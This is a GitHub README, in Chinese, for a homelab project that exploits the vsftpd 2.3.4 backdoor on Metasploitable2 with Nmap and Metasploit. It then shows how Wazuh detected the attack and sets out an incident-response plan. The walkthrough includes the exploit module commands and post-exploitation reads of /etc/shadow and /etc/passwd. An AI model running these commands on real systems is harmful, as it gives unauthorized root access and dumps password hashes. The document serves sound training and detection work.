INFERNO-VEE/SOC-HOMELAB

GitHub: INFERNO-VEE/SOC-HOMELAB

一套完整的SOC攻防实验文档,通过真实漏洞复现演示了从攻击利用到SIEM检测再到事件响应的全生命周期,帮助安全从业者建立攻防兼备的实战分析能力。

Stars: 1 | Forks: 0

# 项目 1 – vsftpd 2.3.4 后门:漏洞利用、检测与事件响应 ## 目标 本项目演示了如何利用 vsftpd 2.3.4 中的一个严重后门漏洞来获取目标系统的 root 权限。同时展示了 SIEM (Wazuh) 如何实时检测该攻击并将其映射到 MITRE ATT&CK 战术。 ## 攻击概述 - 漏洞:vsftpd 2.3.4 后门 - 获取的权限:Root shell(无需身份验证) - 关键 IOC:端口 6200 上的异常服务 - 检测来源:摄入到 Wazuh 的 Syslog 日志 - MITRE ATT&CK 战术:Initial Access、Privilege Escalation、Discovery、Credential Access ## 使用的工具 - Kali Linux(攻击机) - Metasploitable2(漏洞目标) - Metasploit Framework - Nmap - Wazuh SIEM ## 实验环境 |机器 |IP 地址 |角色 | |----------------|--------------|---------------| |Kali Linux |192.168.56.102|攻击机 | |Metasploitable2 |192.168.56.103|目标机 | |Wazuh |192.168.56.105|SIEM / 防御方 | ## 步骤 1:扫描目标 运行 Nmap 服务扫描以识别目标上的开放端口和运行服务: ``` nmap -sV 192.168.56.103 ``` 关键发现:端口 21 正在运行 vsftpd 2.3.4 —— 这是一个已知包含后门的版本。 ![Nmap Scan](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/09f9688b04023618.png) ## 步骤 2:启动 Metasploit 在 Kali Linux 上打开 Metasploit: ``` msfconsole ``` 等待 msf6 > 提示符出现。 ## 步骤 3:加载 vsftpd 漏洞利用模块 ``` use exploit/unix/ftp/vsftpd_234_backdoor show options ``` 这将加载漏洞利用模块。`show options` 命令会显示需要进行配置的选项。 ## 步骤 4:配置并运行漏洞利用 设置目标 IP 和你的 Kali IP,然后运行: ``` set RHOSTS 192.168.56.103 set LHOST 192.168.56.102 run ``` 结果: -192.168.56.103:21 - Backdoor has been spawned! -Meterpreter session 1 opened (192.168.56.102:4444 → 192.168.56.103:55744) ![Meterpreter Session](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/6eeb590610023620.png) ## 步骤 5:确认 Root 权限 进入 shell 并确认身份: ``` shell id whoami ``` 结果: uid=0(root) gid=0(root) whoami: root 在未提供任何凭据的情况下获得了完整的 root 权限。 ![Root Access](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/ae4b24a212023622.png) ## 步骤 6:漏洞利用后的发现 运行发现命令以模拟攻击者获取访问权限后的行为: ``` cat /etc/shadow cat /etc/passwd netstat -antp ps aux ``` 各命令的作用如下: - cat /etc/shadow —— 导出所有用户的密码哈希 - cat /etc/passwd —— 列出系统上的所有用户账户 - netstat -antp —— 映射活动的网络连接 - ps aux —— 列出所有正在运行的进程 ![Shadow File](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/141e777c3a023624.png) ![Passwd File](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/53d849d282023626.png) ![Netstat Output](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/0d333b62a3023629.png) ![PS Aux Output](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/192c97516c023631.png) ## 步骤 7:查看 Wazuh 的检测结果 在 Wazuh 仪表板上,导航到 Security Events 并按目标 IP 192.168.56.103 进行过滤。 Wazuh 生成了 13 个安全事件,包括: |Rule ID|描述 |严重性 | |-------|--------------------------------------|-----------| |533 |监听端口状态发生更改 |中 (7) | |5402 |成功执行 sudo 提权至 ROOT |低 (3) | |5501 |PAM 登录会话已开启 |低 (3) | |5502 |PAM 登录会话已关闭 |低 (3) | ![Wazuh Security Events](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/8fac59fdca023632.png) ## 检测洞察 - 规则 533(端口更改检测):由于后门打开了与正常 FTP 操作无关的 6200 端口而被触发。 - 规则 5501/5502(PAM 活动):表示可能与未经授权访问相关的会话活动。 - 规则 5402(Privilege Escalation):暗示了提权访问,尽管在这种情况下 root 权限是通过漏洞利用直接获取的。 **关键洞察:** 此次攻击中最可靠的失陷指标是端口 6200 的出现,它与 vsftpd 后门存在极强的关联性。 ## 步骤 8:MITRE ATT&CK 映射 Wazuh 自动将攻击活动映射到了 MITRE ATT&CK 战术: - Initial Access —— T1190 Exploit Public-Facing Application - Privilege Escalation —— T1068 Exploitation for Privilege Escalation - Discovery —— T1087 Account Discovery,T1049 Network Connections Discovery - Credential Access —— T1003 OS Credential Dumping ![MITRE ATT&CK Dashboard](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/f8fdd9cc61023634.png) ## 分析 此次攻击成功利用了 vsftpd 2.3.4 中已知的一个后门,在无需身份验证的情况下立即获得了 root 权限。 从防御的角度来看,Wazuh 并未直接检测到 vsftpd 的漏洞利用行为,而是识别出了漏洞利用后的系统行为,例如: - 一个新的监听服务(端口 6200) - 特权会话活动 - 系统级命令执行 这突显了一个关键的检测盲区:除非有网络或基于主机的监控作为辅助支持,否则应用层的漏洞利用行为可能会被忽视。 然而,漏洞利用后的活动产生了足以用于检测的遥测数据,这证明了监控系统行为的重要性,而不是仅仅依赖于漏洞特征库。 ## 事件响应视角 分诊: - 识别与异常端口活动相关的告警(端口 6200) - 将其与系统日志和会话活动进行关联 调查: - 确认是否存在未经授权的服务 - 使用 netstat 检查活动连接 - 审查进程列表以查找可疑活动 遏制: - 将受影响的主机从网络中隔离 - 终止恶意会话 根除: - 移除带有漏洞的 vsftpd 版本 - 对系统进行修补或重建 经验教训: - 监控异常的端口活动 - 部署基于主机的入侵检测系统 - 定期修补对公网开放的服务 ## 关键注意事项 - vsftpd 2.3.4 后门是于 2011 年作为一种供应链攻击被引入到源代码中的 - 不需要任何凭据 —— 后门会自动在端口 6200 上开启一个 root shell - 活动的 Meterpreter 连接在 netstat 输出中可见 —— 这是一个关键 IOC - Wazuh 完全通过 syslog 转发检测到了此次攻击 —— 目标机上没有安装任何代理 - 网络日志中出现端口 6200 是此特定攻击的可靠指标 ## 预防措施 - 立即将 vsftpd 升级到未带有后门的版本 - 用 SFTP 替换 FTP 以进行安全的文件传输 - 在防火墙处阻断端口 6200 —— 它没有任何合法用途 - 监控对 /etc/shadow 的访问 —— 合法系统极少直接读取此文件 - 使用 SIEM 对 Privilege Escalation 和异常 sudo 活动发出告警 - 部署基于主机的入侵检测系统 (HIDS),以更好地洞察系统活动 ## 检测改进 - 创建自定义 Wazuh 规则,专门针对端口 6200 的活动发出告警 - 将 FTP 服务日志与异常 shell 访问进行关联 - 对 /etc/shadow 等关键文件实施文件完整性监控 ## MITRE ATT&CK 技术 |技术 ID |名称 | |-------------|-----------------------------------------| |T1595 |Active Scanning | |T1190 |Exploit Public-Facing Application | |T1068 |Exploitation for Privilege Escalation | |T1003 |OS Credential Dumping | |T1087 |Account Discovery | |T1049 |System Network Connections Discovery | |T1057 |Process Discovery | ## 总结 本项目在一个受控的实验环境中,使用已知的 vsftpd 2.3.4 后门漏洞,演示了从攻击到检测的完整生命周期。攻击者在无需身份验证的情况下成功获取了 root 级别的访问权限,并进行了漏洞利用后的活动,例如系统发现和凭据文件访问。 从防御的角度来看,Wazuh 没有直接检测到漏洞利用本身,而是通过日志遥测成功捕获了系统失陷后的行为。诸如端口 6200 上的异常服务和与特权相关的事件等关键指标,为调查提供了有意义的信号。 该练习强调了行为监控、日志关联以及基于 SIEM 的检测在识别绕过传统基于特征的安全控制的威胁时的重要性。它还强化了对面向公网的应用程序进行及时修补、服务加固以及持续监控的必要性。 总体而言,本实验加深了笔者对攻击者在系统失陷后如何运作,以及 SOC 分析人员如何使用 SIEM 工具和结构化的事件响应流程来检测和响应此类活动的理解。
标签:AMSI绕过, CISA项目, CTI, Homelab, IOC, meg, Metasploitable2, Nmap, PFX证书, Root权限, vsftpd 2.3.4, Wazuh, 信息安全, 后门漏洞, 威胁检测, 安全实验, 安全运营中心, 实战攻防, 家庭实验室, 库, 应急响应, 攻击检测, 数据统计, 端口扫描, 网络安全, 网络映射, 网络靶场, 虚拟驱动器, 隐私保护